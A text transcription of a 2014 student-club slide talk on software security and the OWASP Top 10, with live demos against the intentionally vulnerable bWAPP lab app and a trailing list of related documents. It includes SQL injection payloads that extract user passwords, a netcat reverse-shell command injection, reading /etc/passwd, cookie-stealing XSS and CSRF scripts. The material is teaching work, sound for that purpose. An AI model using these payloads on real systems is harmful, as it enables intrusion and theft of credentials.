ACM SIG Security November 18, 2014
|
|
- Shanon Wilson
- 8 years ago
- Views:
Transcription
1 ACM SIG Security November 18, 2014
2 Why Talk About So/ware Security? Free Pizza So/ware is Everywhere (Pervasive) All computer security problems are so/ware security problems Even if you don t go into security work, understand the concepts.
3 About Me Tim MalcomVeKer Spent too much Lme in school BA Sociology, SBU BA Computer Science, UMKC MS InformaLon Assurance, Norwich University S&T PhD Student (unll work + PhD + kids + sleep > 24 hours/day) Former SIG- SEC member So/ware Developer C#, Java, JavaScript, C/C++, Python, Perl, SQL, BASH, PHP, etc. Alphabet Soup CISSP and other cerlficalons Security Consultant FishNet Security
4 About FishNet Security Founded 1996 NaLon s #1 Security Provider Tremendous Company Growth Revenue, Profit, Employees Based out of Kansas City (Overland Park) Consultants all over the country Work from home! Fortune 500 clients Speakers at Blackhat, DefCon, etc.
5 FishNet Security is Hiring! If this talk interests you (Or if other security topics are intereslng) Join the largest growing team of security professionals! Junior Consultant Program To bring in more new talent Solve the chicken and egg problem
6 Overview ü Pizza ü Intros Obligatory Legal Warning So/ware Security Concepts Tools OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
7 Quick Poll Who here has actually hacked a computer system or applicalon? Who here has observed somebody else hacking a system? Who has NEVER done or seen it firsthand?
8 Obligatory Legal Disclaimer Hacking your own stuff is (probably) not a crime Unauthorized access to others computers IS a Federal Felony or Misdemeanor Get your authorizalon IN WRITING Ask me how I know offline It s no fun to be on the receiving end of an FBI misunderstanding. Ask me how I nevermind. When all else fails hire a good lawyer
9
10 Overview ü Pizza ü Intros ü Obligatory Legal Warning So/ware Security Concepts Tools OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
11 So/ware Security Concepts What s Old is New Problems are literally as old as the first systems 1960s 1970s Network Security == So/ware listening on network ports Don t need firewalls; Need CORRECT so/ware design & implementalon Input Vectors == AKack Vectors Security So/ware!= Secure So/ware Security Features!= Secure So/ware
12 So/ware Security Concepts 2001: AKack a Microso/ Service 1 vuln, exploit many targets 0day: 1 average hacker, 1 work week 2007: AKack a Custom Web ApplicaLon Harder to find vulns in commercial apps 2014: Blended akacks (web/mobile/services) 0day: Team of 5-6 hackers, 1 work month
13 Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts Tools OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
14 TesLng Tools: Web Apps Burp Suite (There s a Free EdiLon) hkp://portswigger.net/ Browser Developer Tools/Console Python, Ruby, C#, Java I don t personally rely on automated scanners False posilves Noisy, potenlally disruplve Scanning/Fuzzing is supplementary/code coverage
15 TesLng Tools: Mobile Burp! Proxy mobile traffic SQLite Read database files ios: iexplorer, ifunbox Jailbroken devices Android: SDK/Eclipse ADB (Android Debugger Bridge) Java Decompilers/Disassemblers Rooted devices
16 Demo Tools We are going to play with an intenlonally vulnerable web app bwapp Also comes as a pre- configured VM with OS vulnerabililes Download for yourself to learn more: hkp://
17 Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts ü Tools OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
18 OWASP Top 10 OWASP == ConsorLum to improve So/ware Security Top 10 == List of Most Common So/ware Security Defects Defacto Gold Standard Good for security professionals to know Even beker for developers to know!
19 OWASP Top (SQL, OS, Cmd) InjecLon 2. AuthenLcaLon/Session Management 3. XSS 4. Direct Object References 5. MisconfiguraLon 6. SensiLve Data Exposure 7. Missing FuncLonal Level Access Control 8. CSRF 9. Using Components with Known VulnerabiliLes 10. Unvalidated Redirects/Forwards
20 A1: InjecLon From OWASP: InjecLon flaws, such as SQL, OS, and LDAP injeclon occur when untrusted data is sent to an interpreter as part of a command or query. The akacker s hoslle data can trick the interpreter into execulng unintended commands or accessing data without proper authorizalon. Remember: Input Vectors are A:ack Vectors
21 A1: InjecLon Cross Site ScripLng (XSS) is really another form of injeclon HTML/JS InjecLon
22 A1: InjecLon All InjecLon akacks can be thwarted by judicious use of input validalon.
23 A1: InjecLon SQL InjecLon is becoming more and more rare (which is a good thing) Likely because of: BeKer development frameworks, tools, libraries Layers of security (server, language, code) Developer awareness Our demo example is likely more simplislc than you will see in the wild
24 A1: InjecLon C# Example Which is vulnerable? Database database=databasefactory.createdatabase(); String sql1 = "SELECT * from itemtable where itemid = " + itemid; string sql2 = string.format("select * from itemtable where itemid = {0}", itemid); DbCommand command = database.getsqlstringcommand(sql1); DbCommand command = database.getsqlstringcommand(sql2); Answer: Both!
25 A1: InjecLon C# Example And the fix Parameterized SQL Queries var database = DatabaseFactory.CreateDatabase(); const string sql = "SELECT * from itemtable where itemid var command = database.getsqlstringcommand(sql); database.addinparameter(command, "ItemID",DbType.Int32, itemid);
26 A1: InjecLon Stored Procedures are not Magically Safe : CREATE PROCEDURE varchar(400) = NULL AS nvarchar(4000) = ' SELECT * FROM [People] where [Name] LIKE "' + '"' EXEC (@sql)
27 A1: Other forms of InjecLon These are not as common as SQL InjecLon LDAP InjecLon: When user input is unintenlonally interpreted as an LDAP (directory) query SaniLze input (similar to SQLI/XSS) and use safe APIs Command InjecLon: More common with PHP/Perl/CGI Open Source/LAMP When user input is unintenlonally interpreted as an OS/ Shell command exec("some_command user $userid pass $pass"); XML/XPATH InjecLon
28 A1: SQL InjecLon Live Demo hkp://localhost/bwapp/sqli_3.php alice/lovezombies alice/ ' alice/ ' - - alice/ ' or 1=1 - - ' or 'a'='a' - -
29 A1: SQL InjecLon Live Demo Extract Data! hkp://localhost/bwapp/sqli_1.php hkp://localhost/bwapp/sqli_1.php?ltle=%27 hkp://localhost/bwapp/sqli_1.php?ltle=blah'+or+1=1- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah'+union+select+1- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah%27+union+select +1,1,1,1,1,1,1- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah%27+union+select +1,DATABASE%28%29,2,3,4,5,6- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah%27+union+select +1,column_name,2,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS +where+table_name=%27users%27+and+table_schema=database %28%29- - %20 hkp://localhost/bwapp/sqli_1.php?ltle=blah%27+union+select +1,login,password, ,secret,1,2+from+users- - %20
30 A1: Command InjecLon Live Demo hkp://localhost/bwapp/commandi.php Concatenate commands: cat /etc/passwd Netcat reverse shell AKacker s shell: nc - lvp nc - e /bin/sh id cat /etc/passwd
31 A1: C# Command InjecLon Example private string Command { get { return TextBoxCmd.Text; } } private string Args { get { return Request.Form[ args ]; } } private string Directory { get { return Request.QueryString[ dir ]; } } var process= new System.DiagnosLcs.Process(); process.startinfo.filename = Command; process.startinfo.arguments = Args; process.startinfo.redirectstandardoutput = true; process.startinfo.workingdirectory = Directory; process.start(); var output = process.standardoutput.readtoend();
32 A2: Broken AuthenLcaLon & Session Management From OWASP: ApplicaLon funclons related to authenlcalon and session management are o/en not implemented correctly, allowing akackers to compromise passwords, keys, or session tokens, or to exploit other implementalon flaws to assume other users idenlles.
33 A2: More than just Strong Passwords
34 A2: Broken AuthenLcaLon & Session Management Watch SensiLve cookies Sent over HTTP Missing Secure flag Session IDs not random or not changing at logon Sessions never expiring Session ExpiraLon Logic implemented on the client in JavaScript (bypass that!) Force browse to Admin/AuthenLcated URLs Login Forms sent over HTTP!
35 A2: Auth/Session Live Demo! hkp://localhost/bwapp/ smgmt_admin_portal.php?admin=0 hkp://localhost/bwapp/ba_logout.php Steal the Session Cookie!
36 A3: Cross Site ScripLng (XSS) From OWASP: XSS flaws occur whenever an applicalon takes untrusted data and sends it to a web browser without proper validalon or escaping. XSS allows akackers to execute scripts in the viclm s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
37 A3: Cross Site ScripLng Hint: Next slide makes a good interview queslon!
38 A3: Cross Site ScripLng (XSS) Three main categories of XSS: 1) Reflected XSS An exploit is served up immediately through a vulnerability in an applicalon s page. 2) Persisted (Stored) XSS An exploit is delivered to the applicalon, persisted (typically in SQL), and then served up to a viclm (or usually viclms) at a later point in Lme. 3) DOM XSS An exploit is delivered to client side JavaScript which renders and executes it within the DOM, not necessarily requiring a round- trip to the server.
39 A3: Cross Site ScripLng (XSS) Declining, but not gone Typical current examples require bypassing filters Really just another form of InjecLon Inject HTML/JS into an app
40 A3: Cross Site ScripLng (XSS) Blacklist vs Whitelist Whitelist is beker, but o/en harder to know EASY BUTTON: HtmlEncode() when wrilng user input to the browser Don t forget Query String or Cookie Params! All input vectors are? Use libraries to make this automalc!
41 A3: Cross Site ScripLng (XSS) Whitelists == Regular Expressions
42 A3: XSS Example ASP.NET SomeLabel.Text = Request["Name"]; SomeLabel.Text = Request.QueryString["Name"]; SomeLabel.Text = Request.Cookies[ Cookie"].Value; All Vulnerable!
43 A3: XSS Example ASP.NET string Name { get { return Server.HtmlEncode(Textbox1.Text); } } SomeLabel.Text = "Welcome " + Name; Vulnerable?
44 A3: XSS Example MVC View C# <div class= MyContent"> <%= Model.Content1 %> <%: Model.Content2 %> <%= Server.HtmlEncode(Model.Content3) %> <%= Html.TextBoxFor(model=>model.Content4) %> <%: Html.TextBoxFor(model=>model.Content5) %> <%= Html.Raw(model.Content6) %> </div> Which content may be vulnerable to XSS? Hint: IHtmlString
45 A3: XSS Example MVC View JS <script type="text/javascript"> $(funclon(){ var orderid = '<%= ViewData["orderId"] %>'; $('#orderid').hide().html(orderid).show('slow'); var actorid = '<%= ViewData[ actorid"] %>'; $('#actorid').hide().text(actorid).show('slow'); }); </script> Vulnerable? Hint:.html()
46 A3: Reflected XSS Demo! hkp://localhost/bwapp/htmli_post.php Joe Schmoe<script>alert('xss')</script> Joe Schmoe<script>document.locaLon='hKp:// hkp://localhost/bwapp/htmli_get.php? firstname=joe&lastname=schmoe%3cscript %3Ealert%28%27xss%27%29%3C%2Fscript %3E
47 A3: Persisted (Stored) XSS Demo! hkp://localhost/bwapp/htmli_stored.php <script>var c=document.cookie.replace(" ","+"); document.write("what about this? <img src=hkp:// script>
48 A3: XSS Filter Evasion <scr<script>ipt>alert(0)</scr</script>ipt> <ScRiPt>alert(0)</sCrIpT> <img src=# onmouseover="alert(0)"> hkps:// XSS_Filter_Evasion_Cheat_Sheet
49 A4: Insecure Direct Object References From OWASP: A direct object reference occurs when a developer exposes a reference to an internal implementalon object, such as a file, directory, or database key. Without an access control check or other proteclon, akackers can manipulate these references to access unauthorized data.
50 A4: Insecure Direct Object Example public int GenerateAwardNumber() { var prev = GetPreviousIssuedAwardNumber(); return prev++; } Vulnerable to Forced Browsing (guessing IDs)
51 A4: Insecure Direct Object Example Directory lislng of web root: ForgotPassword.aspx Default.aspx Login.jsp /Admin Passwords.txt Vulnerable to Forced Browsing (guessing URLs)
52 A4: Insecure Direct Object Anecdote From a client engagement this past summer URL encoded parameter like /viewreport.aspx?u=%5c %5cserver%5cshare%5cfile.pdf Decodes as: \\server\share\file.pdf How about this instead? /viewreport.aspx?u=c%3a%5cinetpub%5cwwwroot %5cweb.config I made the app give me all source.aspx pages + all compiled DLLs referenced by.aspx pages + config! Reflected the.net DLLs to C# source Pwned all source + Lme == found more vulns in code!
53 A4: Direct Object Reference Live Demo! hkp://localhost/bwapp/ insecure_direct_object_ref_2.php
54 A5: Security MisconfiguraLon From OWASP: Good security requires having a secure configuralon defined and deployed for the applicalon, frameworks, applicalon server, web server, database server, and pla orm. Secure sešngs should be defined, implemented, and maintained, as defaults are o/en insecure. AddiLonally, so/ware should be kept up to date.
55 A5: Security MisconfiguraLon It happens. Read the manual. bwapp has examples.
56 A6: SensiLve Data Exposure From OWASP: Many web applicalons do not properly protect sensilve data, such as credit cards, tax IDs, and authenlcalon credenlals. AKackers may steal or modify such weakly protected data to conduct credit card fraud, idenlty the/, or other crimes. SensiLve data deserves extra proteclon such as encryplon at rest or in transit, as well as special precaulons when exchanged with the browser.
57 A6: SensiLve Data Exposure Use HTTPS Use a well designed/reviewed Crypto API Or be careful and Use industry accepted algorithms Use industry accepted Key Lengths Salt Your Hashes What s your IniLalizaLon Vector, Victor? Who has access to the keys?
58 A6: SensiLve Data Exposure Turn on HTTPS Use good (strong and non- expired) cerlficates Once you go HTTPS, don t revert to HTTP All objects in the page should use HTTPS
59 A6: SensiLve Data SoluLons Or beker yet Do you have to keep that sensilve data? Not processing/storing sensilve data is a VALID oplon Credit Card TokenizaLon
60 A6: SensiLve Data Exposure The main benefit to encryplng sensilve values in the DB is for another layer against SQL InjecLon. UserID: jon' union select ExpiraLonMonth, Number, FullName from CreditCard where ExpiraLonYear = '2012' - - If Number is encrypted, this SQL InjecLon akack has less bite When the applicalon accesses the Number, decryplon happens in applicalon layer code with a key the akacker doesn t have.
61 A6: SensiLve Data Exposure Remember: Don t roll your own Security Features Remember: Don t roll your own Crypto
62 A7: Missing FuncLon Level From OWASP: Access Control Most web applicalons verify funclon level access rights before making that funclonality visible in the UI. However, applicalons need to perform the same access control checks on the server when each funclon is accessed. If requests are not verified, akackers will be able to forge requests in order to access funclonality without proper authorizalon.
63 A7: Missing FuncLon Level Access Control Never assume a user is authenlcated! Corollary: Always check for authenlcalon if (user.isauthenlcated()) { } ValidaLon Rule #1: Validate on the Client for UX ValidaLon Rule #2: Validate on the Server for Security Especially important in Services, AJAX
64 A7: Missing FuncLon Level Access Control Another recent client anecdote Modern web app leverages RESTful/JSON services User login form sends credenlals over HTTPS to service Service responds with results in JSON format All access control was wriken on the CLIENT in JavaScript! Simply proxy the server response, edit with Yes I am the Administrator The client side JS took care of the rest.
65 A8: Cross Site Request Forgery (CSRF) From OWASP: A CSRF akack forces a logged- on viclm s browser to send a forged HTTP request, including the viclm s session cookie and any other automalcally included authenlcalon informalon, to a vulnerable web applicalon. This allows the akacker to force the viclm s browser to generate requests the vulnerable applicalon thinks are legilmate requests from the viclm. Dropped from #5 in 2010
66 A8: Cross Site Request Forgery (CSRF) Pronounced Sea- Surf One of the hardest akack models to understand I find this one OFTEN and even in Commercial Web ApplicaLon Products O/en combined with XSS (client side script to force the viclm s browser to do something)
67 A8: CSRF SoluLons SensiLve TransacLons should not use GET Note: SensiLve TransacLons via POST can slll be exploited with combined XSS Use a library that will handle adding nonces to your forms. NONCE == Number Used Once MVC: AnL- Forgery Tokens A random number token that is temporarily persisted in session/state/memory/disk on the server and added as a hidden form parameter <input type=hidden name= validator" value=" ">
68 A8: CSRF SoluLons - Nonces MVC s AnL- Forgery Token (Html.BeginForm("Manage", "Account")) {
69 A8: MVC AnL- Forgery Tokens With AJAX:
70 A8: MVC AnL- Forgery Tokens ValidaLon:
71 A8: CSRF Live Demo! hkp://localhost/bwapp/csrf_1.php hkp://localhost/bwapp/csrf_2.php Combine with XSS! hkp://localhost/bwapp/htmli_stored.php <script>document.write("thanks for making a donalon! <img src=/bwapp/csrf_2.php? account= &amount=500&acLon=tra nsfer");</script>
72 A8: CSRF Live POST Demo! hkp://localhost/bwapp/csrf_3.php hkp://localhost/bwapp/htmli_stored.php Secrets are changed! <script> var xhr = new XMLHKpRequest(); xhr.open('post', '/bwapp/csrf_3.php', true); xhr.setrequestheader('content- type', 'applicalon/x- www- form- urlencoded'); xhr.onload = funclon () { // do something to response console.log(this.responsetext); }; xhr.send('secret=shhh&login=bee&aclon=change'); </script>
73 A9: Using Known Vulnerable Components From OWASP: Components, such as libraries, frameworks, and other so/ware modules, almost always run with full privileges. If a vulnerable component is exploited, such an akack can facilitate serious data loss or server takeover. ApplicaLons using components with known vulnerabililes may undermine applicalon defenses and enable a range of possible akacks and impacts.
74 A9: Using Known Vulnerable Components Keep libraries up to date Track old stuff that needs updalng as Technical Debt Wrap 3 rd party libraries to help migralon to new/different libraries in the future
75 A10: Unvalidated Redirects and From OWASP: Forwards Web applicalons frequently redirect and forward users to other pages and websites, and use untrusted data to determine the deslnalon pages. Without proper validalon, akackers can redirect viclms to phishing or malware sites, or use forwards to access unauthorized pages.
76 A10: Redirect Live Demo! hkp://localhost/bwapp/ unvalidated_redir_fwd_1.php hkp://localhost/bwapp/ unvalidated_redir_fwd_1.php?url=hkp%3a %2F%2Fwww.google.com hkp://localhost/bwapp/ unvalidated_redir_fwd_2.php? ReturnUrl=portal.php
77 OWASP Recap 1. (SQL, OS, Cmd) InjecLon 2. AuthenLcaLon/Session Management 3. XSS 4. Direct Object References 5. MisconfiguraLon 6. SensiLve Data Exposure 7. Missing FuncLonal Level Access Control 8. CSRF 9. Using Components with Known VulnerabiliLes 10. Unvalidated Redirects/Forwards
78 Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts ü Tools ü OWASP Top 10 With Live Examples You can play too OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
79 OWASP Mobile Top Weak Server Side Controls 2. Insecure Data Storage 3. Insufficient TransportaLon Layer ProtecLon 4. Unintended Data Leakage 5. Poor AuthorizaLon and AuthenLcaLon 6. Broken Cryptography 7. Client Side InjecLon 8. Security Decisions via Untrusted Inputs 9. Improper Session Handling 10. Lack of Binary ProtecLons hkps:// OWASP_Mobile_Security_Project_- _Top_Ten_Mobile_Risks
80 OWASP Mobile Top 10 #1 Weak Server Side Controls All the Stuff we just talked about (OWASP s regular Top 10)
81 OWASP Mobile Top 10 #2 Insecure Data Storage Users can manipulate the device s file system
82 OWASP Mobile Top 10 #3 Insufficient Transport Layer ProtecLon Use TLS/SSL just like everything else
83 OWASP Mobile Top 10 #4 Unintended Data Leakage Logging Caching HTML5 storage Buffers (Copy/Paste) Key Presses 3 rd Party AnalyLcs
84 OWASP Mobile Top 10 #5 Poor AuthorizaLon and AuthenLcaLon Match the web app Consider stolen device scenarios Convenience vs. Security (remember me)
85 OWASP Mobile Top 10 #6 Broken Crypto Don t roll your own Remember #2 Users can access keys on file system And no compiling the key into the binary does not hide it.
86 OWASP Mobile Top 10 #7 Client Side InjecLon SQL InjecLon on the client (SQLite) Local File Inclusion or Command InjecLon XSS/JS if mobile app is based on HTML (and most are) Buffer Overflows Yep, what s old is new again
87 OWASP Mobile Top 10 #8 Security Decisions via Untrusted Inputs ios IPC (Inter Process CommunicaLon) Input Vectors are?
88 OWASP Mobile Top 10 #9 Improper Session Handling Same as with web apps: Timeouts Invalidate on the server, not just the client Rotate Cookies upon authenlcalon Protect session data
89 OWASP Mobile Top 10 #10 Lack of Binary ProtecLons Good luck with this one Make disassembly difficult Encrypted app code (ios) Code obfuscalon (packing) Crypto checksums (probably not effeclve) Jailbreak/Debug deteclon (just a speed bump)
90 Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts ü Tools ü OWASP Top 10 With Live Examples You can play too ü OWASP s Mobile Top 10 XKCD AppreciaLon Sprinkled Throughout
91
92 Overview ü Pizza ü Intros ü Obligatory Legal Warning ü So/ware Security Concepts ü Tools ü OWASP Top 10 With Live Examples You can play too ü OWASP s Mobile Top 10 ü XKCD AppreciaLon ü Sprinkled Throughout
93 QuesLons? malcomveker _shi/2_ gmail.com Lm.malcomveKer _shi/2_ fishnetsecurity.com
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationWeb Application Penetration Testing
Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel William.Bechtel@att.com
More informationWeb applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
More informationMagento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationHow to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
More informationEnterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
More informationThe Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationOWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
More informationStill Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationProject 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
More informationMembers of the UK cyber security forum. Soteria Health Check. A Cyber Security Health Check for SAP systems
Soteria Health Check A Cyber Security Health Check for SAP systems Soteria Cyber Security are staffed by SAP certified consultants. We are CISSP qualified, and members of the UK Cyber Security Forum. Security
More informationDetecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter conpap@owasp.gr
More informationASP.NET MVC Secure Coding 4-Day hands on Course. Course Syllabus
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
More informationCSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
More informationWHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications
More informationSix Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business
6 Six Essential Elements of Web Application Security Cost Effective Strategies for Defending Your Business An Introduction to Defending Your Business Against Today s Most Common Cyber Attacks When web
More informationArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
More informationWHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6 Ensuring compliance for PCI DSS 6.5 and 6.6 Page 2 Overview Web applications and the elements surrounding them
More informationOWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair dave.wichers@owasp.org COO, Aspect Security dave.wichers@aspectsecurity.com Copyright 2007 - The Foundation This work is available
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More information(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
More informationTesting the OWASP Top 10 Security Issues
Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 info@magenic.com Who Are
More informationWeb Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationCheck list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
More informationOWASP AND APPLICATION SECURITY
SECURING THE 3DEXPERIENCE PLATFORM OWASP AND APPLICATION SECURITY Milan Bruchter/Shutterstock.com WHITE PAPER EXECUTIVE SUMMARY As part of Dassault Systèmes efforts to counter threats of hacking, particularly
More informationWeb Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
More informationIntrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
More informationCriteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
More informationSecure development and the SDLC. Presented By Jerry Hoff @jerryhoff
Secure development and the SDLC Presented By Jerry Hoff @jerryhoff Agenda Part 1: The Big Picture Part 2: Web Attacks Part 3: Secure Development Part 4: Organizational Defense Part 1: The Big Picture Non
More informationWeb Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
More informationelearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
More informationApplication Security Vulnerabilities, Mitigation, and Consequences
Application Security Vulnerabilities, Mitigation, and Consequences Sean Malone, CISSP, CCNA, CEH, CHFI sean.malone@coalfiresystems.com Institute of Internal Auditors April 10, 2012 Overview Getting Technical
More informationTop Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia
Top Ten Web Application Vulnerabilities in J2EE Vincent Partington and Eelco Klaver Xebia Introduction Open Web Application Security Project is an open project aimed at identifying and preventing causes
More informationIntroduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3
Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection
More informationHack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationConducting Web Application Pentests. From Scoping to Report For Education Purposes Only
